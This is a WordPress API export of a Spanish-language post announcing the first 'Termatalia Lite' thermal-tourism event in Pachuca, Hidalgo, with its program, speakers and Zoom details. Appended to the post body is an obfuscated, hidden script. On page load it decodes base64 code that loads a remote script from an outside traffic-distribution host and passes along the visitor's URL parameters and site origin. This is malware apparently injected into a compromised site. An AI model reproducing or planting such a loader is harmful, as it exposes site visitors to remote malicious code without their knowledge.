{"id":9308,"date":"2025-02-25T09:03:19","date_gmt":"2025-02-25T12:03:19","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9308"},"modified":"2025-08-13T15:31:41","modified_gmt":"2025-08-13T18:31:41","slug":"el-estado-de-hidalgo-en-mexico-acoge-la-primera-edicion-de-termatalia-lite","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9308","title":{"rendered":"El Estado de Hidalgo, en M\u00e9xico, acoge la primera edici\u00f3n de \u201cTermatalia Lite\u201d"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-97107b10d483e8296ff953b687df094c\" style=\"background-color:#085f91\"><strong><em>Es un evento formativo y de networking promovido por la Asociaci\u00f3n Latinoamericana de Spa y la red de delegados internacionales en este pa\u00eds de la Feria Internacional de Turismo Termal, Salud y Bienestar<\/em><\/strong><\/h4>\n\n\n\n<p><em><strong>Tendr\u00e1 lugar el lunes 3 de marzo y podr\u00e1 seguirse de forma presencial o virtual<\/strong>. <\/em><\/p>\n\n\n\n<p><em><strong>El director de la feria, Rogelio Mart\u00ednez, participar\u00e1 en el evento para invitar a los profesionales del sector mexicanos a participar en la pr\u00f3xima edici\u00f3n de Termatalia Colombia que se celebrar\u00e1 en #Paipa, #Boyac\u00e1, entre el 24 y el 26 de septiembre de 2025<\/strong><\/em><\/p>\n\n\n\n<p>La primera edici\u00f3n de&nbsp;<strong>TERMATALIA LITE<\/strong>&nbsp;es una propuesta innovadora en la promoci\u00f3n del turismo termal, la salud y el bienestar. Esta iniciativa busca consolidar a Termatalia, feria Internacional de Turismo Termal, Salud y Bienestar, como una plataforma global de conocimiento y vinculaci\u00f3n en el sector termal, incorporando nuevas estrategias para atraer a profesionales emergentes y fortalecer la comunidad internacional de termalismo.<\/p>\n\n\n\n<p>Este evento se desarrollar\u00e1 en un formato h\u00edbrido, combinando sesiones presenciales con conferencias virtuales, ofreciendo as\u00ed una oportunidad para el intercambio de conocimiento y experiencias entre expertos y delegados de diversos pa\u00edses. Adem\u00e1s, ser\u00e1 transmitido online a trav\u00e9s de la plataforma Zoom, buscando dar acceso a personas de toda Iberoam\u00e9rica.<\/p>\n\n\n\n<p>Esta primera edici\u00f3n de&nbsp;<strong>TERMATALIA LITE<\/strong>&nbsp;representa un paso estrat\u00e9gico en la evoluci\u00f3n del termalismo a nivel global. Al reunir a expertos, empresarios e investigadores en un mismo espacio, el evento fortalecer\u00e1 la red de conocimiento y contribuir\u00e1 al crecimiento del sector, asegurando su desarrollo y posicionamiento en los pr\u00f3ximos a\u00f1os.<\/p>\n\n\n\n<figure class=\"wp-block-video\"><video height=\"720\" style=\"aspect-ratio: 1278 \/ 720;\" width=\"1278\" controls src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/WhatsApp-Video-2025-02-17-at-3.45.12-PM.mp4\"><\/video><figcaption class=\"wp-element-caption\"><em><sup><mark>Publicidad:<\/mark><\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<p>Con&nbsp;<strong>TERMATALIA LITE<\/strong>, se busca construir una comunidad global m\u00e1s inclusiva, sostenible y tecnol\u00f3gicamente avanzada en el sector del turismo de bienestar. Este evento marcar\u00e1 el inicio de un nuevo formato de difusi\u00f3n de Termatalia, fortaleciendo su posicionamiento internacional y promoviendo la colaboraci\u00f3n entre profesionales del sector.<\/p>\n\n\n\n<p>Se espera la participaci\u00f3n de representantes de diversas instituciones, delegados internacionales y empresas especializadas en termalismo, consolidando a M\u00e9xico como un punto clave en la red global de turismo de salud y bienestar.<\/p>\n\n\n\n<p><strong>OBJETIVOS&nbsp;<\/strong><\/p>\n\n\n\n<p>1. Promoci\u00f3n y consolidaci\u00f3n del evento principal: Fomentar la interacci\u00f3n global y posicionar las ediciones presenciales de Colombia 2025 y Ourense 2026.<\/p>\n\n\n\n<p>2. Atracci\u00f3n de nuevos profesionales: Ampliar la comunidad de especialistas en turismo termal, incluyendo a j\u00f3venes investigadores, terapeutas y empresarios del sector.<\/p>\n\n\n\n<p>3. Difusi\u00f3n del conocimiento especializado: Explorar los avances cient\u00edficos, terap\u00e9uticos y comerciales del termalismo a nivel mundial.<\/p>\n\n\n\n<p>4. Generaci\u00f3n de oportunidades de negocio: Facilitar la conexi\u00f3n entre empresas, instituciones y profesionales para impulsar el desarrollo del sector.<\/p>\n\n\n\n<p><strong>PRIMERA EDICI\u00d3N DE TERMATALIA LITE<\/strong><br>\u201cHidalgo, Mexico\u201d<br>Fecha del evento: 3 de marzo de 2025 Cita: 9:45 AM<br>Lugar: Instituto de Estudios Eco Empresariales de Hidalgo Direcci\u00f3n: Constructores Hidalguenses 104, Venta Prieta, 42083 Pachuca de Soto, Hidalgo, M\u00e9xico<br>ZOOM<br>Meeting ID: 894 3156 2360<br>Passcode: ALSPA<\/p>\n\n\n\n<p><br><strong>PRESENCIA INSTITUCIONAL<\/strong><br>\u2022 Sr. Rogelio Mart\u00ednez, CEO de Termatalia y Expourense.<br>\u2022 Representante de la Secretar\u00eda de Turismo del Estado de Hidalgo.<br>\u2022 Director del Instituto de Estudios Eco Empresariales de Hidalgo.<\/p>\n\n\n\n<p><strong>SPEAKERS Y CONFERENCISTAS<\/strong><br>El programa acad\u00e9mico incluir\u00e1 la intervenci\u00f3n de expertos reconocidos en distintas \u00e1reas del termalismo:<br>\u2022 Dr. Ram\u00f3n de la Rosa, presidente de ALSPA.<br>\u2022 Dra. Mar\u00eda de Jes\u00fas Puy, Especialista en Recursos Geot\u00e9rmicos de la Universidad de Guanajuato.<br>\u2022 Dra. Marianela de la Pe\u00f1a, Investigadora en Ciencias Marinas y delegada de M\u00e9xico para Termatalia.<br>\u2022 Dra. Patricia Hern\u00e1ndez, directora de ALSPA y l\u00edder en cosm\u00e9tica termal.<br>\u2022 Mtro. Mario Azael Reza Guerra, delegado de Termatalia M\u00e9xico y presidente del Consejo Regional de Turismo de Salud y Bienestar.<\/p>\n\n\n\n<p><strong>CONTACTO Y REGISTRO<\/strong><br \/>Tambi\u00e9n puede comunicarse con:<br \/>ALSPA: +52 5548051110 www.spalatinoamerica.com<br \/>ACTEM: +52 4426687548 www.actem.com.mx<br \/>TERMATALIA: +34 988 366 030 www.termatalia.com<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.termatalia.com\/el-estado-de-hidalgo-en-mexico-acoge-la-primera-edicion-de-termatalia-lite\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"597\" height=\"238\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/Captura-de-pantalla_25-2-2025_85839_www.termatalia.com_.jpeg\" alt=\"\" class=\"wp-image-9309\" style=\"width:288px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/Captura-de-pantalla_25-2-2025_85839_www.termatalia.com_.jpeg 597w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/Captura-de-pantalla_25-2-2025_85839_www.termatalia.com_-300x120.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/Captura-de-pantalla_25-2-2025_85839_www.termatalia.com_-320x128.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/02\/Captura-de-pantalla_25-2-2025_85839_www.termatalia.com_-480x191.jpeg 480w\" sizes=\"(max-width: 597px) 100vw, 597px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Es un evento formativo y de networking promovido por la Asociaci\u00f3n Latinoamericana de Spa y la red de delegados internacionales en este pa\u00eds de la Feria Internacional de Turismo Termal, Salud y Bienestar Tendr\u00e1 lugar el lunes 3 de marzo y podr\u00e1 seguirse de forma presencial o virtual. El director de la feria, Rogelio Mart\u00ednez, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9310,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-9308","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9308"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9308\/revisions"}],"predecessor-version":[{"id":9975,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9308\/revisions\/9975"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9310"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}